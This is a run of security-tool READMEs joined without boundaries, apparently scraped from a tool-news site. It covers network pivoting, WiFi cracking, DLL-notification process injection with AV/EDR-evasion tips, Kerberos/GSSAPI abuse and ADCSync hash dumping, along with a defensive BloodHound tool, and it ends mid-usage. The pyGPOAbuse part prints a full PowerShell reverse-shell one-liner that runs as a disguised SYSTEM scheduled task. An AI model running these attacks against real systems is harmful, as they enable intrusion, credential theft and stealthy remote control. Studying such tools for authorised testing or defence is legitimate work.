Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng Β» session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] Β» ifconfig
[...]
βββββββββββββββββββββββββββββββββββββββββββββββ
β Interface 3 β
ββββββββββββββββ¬βββββββββββββββββββββββββββββββ€
β Name β wlp3s0 β
β Hardware MAC β de:ad:be:ef:ca:fe β
β MTU β 1500 β
β Flags β up|broadcast|multicast β
β IPv4 Address β 192.168.0.30/24 β
ββββββββββββββββ΄βββββββββββββββββββββββββββββββ
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββ ββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌββββββββββββββββββββββββ& #9508;
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
git clone https://github.com/redhuntlabs/antisquat
.pip install -r requirements.txt
..openai-key
and paste your chatgpt api key in there..godaddy-key
and paste your godaddy api key in there.blacklist.txt
. Type in a line-separated list of domains youβd like to ignore. Regular expressions are supported.python3.8 antisquat.py domains.txt
Letβs say youβd like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com
. Then run python3.8 antisquat.py domains.txt
.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface
Management platform, check out NVADR.
Airgorah
is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
This software only works on linux
and requires root
privileges to run.
You will also need a wireless network card that supports monitor mode
and packet injection
.
The installation instructions are available here.
The documentation about the usage of the application is available here.
This project is released under MIT license.
If you have any question about the usage of the application, do not hesitate to open a discussion
If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
go install github.com/devanshbatham/rayder@v0.0.4
Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:
rayder -w path/to/workflow.yaml
A workflow is defined in a YAML file with the following structure:
vars:
VAR_NAME: value
# Add more variables...
parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars
section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}
).
To define variables, add them to the vars
section of your workflow YAML file:
vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...
You can reference variables within your command strings using double curly braces ({{}}
). For example, if you defined a variable OUTPUT_DIR
, you can use it like this:
modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value
to provide values for specific variables. For example:
rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars
section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
vars:
ORG: "example.org"
OUTPUT_DIR: "results"
modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"
When executing the workflow, you can provide values for ORG
and OUTPUT_DIR
via the command line like this:
rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir
This will override the default values and use the provided values for these variables.
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"
parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt
- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false
- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true
- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false
- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false
To execute the above workflow, run the following command:
rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results
The parallel
field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel
to true
allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false
, modules will execute one after another.
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration of this project comes from Awesome taskfile project.
Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
DllNotificationInection is a POC of a new βthreadlessβ process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
https://shorsec.io/blog/dll-notification-injection/
DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.
gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks
The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.
The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt
, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
The libkrb5-dev
package needs to be installed prior to installing python requirements
Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool
pip install -r requirements.txt
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows
within the Operating System attribute.
Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns
mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local
.
Adding a DNS A
record for host ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully
Adding a reverse PTR
record for host ahost.ad.ginge.com
. Notice that the data
argument is terminated with a .
, this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR
records are stored in different zones to A
records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully
Forward and reverse DNS lookup results after execution
nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1
Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1
Name: ahost.ad.ginge.com
Address: 192.168.128.50
This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
To use this tool we need the following things:
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of th e target machine [required]
--help Show this message and exit.
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
Index:
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and or targets:
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.
The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
To run FalconHound, just run the binary and add the -go
parameter to have it run all queries in the actions folder.
./falconhound -go
To list all enabled actions, use the -actionlist
parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go
parameter.
./falconhound -actionlist -go
To run a select set of actions, use the -ids
parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go
parameter.
./falconhound -ids action1,action2,action3 -go
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config
flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir
flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
./falconhound -go -actions-dir /path/to/actions
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault
flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self explanatory,there are some important things to note about actions:
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
The Query
field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform
. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription)
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name
and Enabled
fields. The Name
field is used to identify the target. The Enabled
field is used to enable or disable the target. If this is set to false, the target will be ignored.
- Name: CSV
Enabled: true
Path: path/to/filename.csv
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields
fields are configured below.
- Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name
syntax.
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is why also query output needs to be controlled, you might otherwise flood your target.
- Name: Sentinel
Enabled: true
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
- Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true
The WatchlistName
field is the name of the watchlist. The DisplayName
field is the display name of the watchlist.
The SearchKey
field is the column that will be used as the search key.
The Overwrite
field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
Enabled: true
Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
Enabled: true
Table: "name"
Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession
. The relationship will have the following properties:
{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
FalconHound will add the following properties to nodes in the graph:
Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids
The currently supported ways of providing FalconHound with credentials are:
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.
The required permissions for your AppID/AppSecret are listed here.
A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User
role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository
Once configured you can add the -keyvault
parameter while starting FalconHound.
When the -keyvault
parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml
. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
Python partial implementation of SharpGPOAbuse by@pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
** You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
The tool suite is three parts in GO:
Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.
Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
-c int
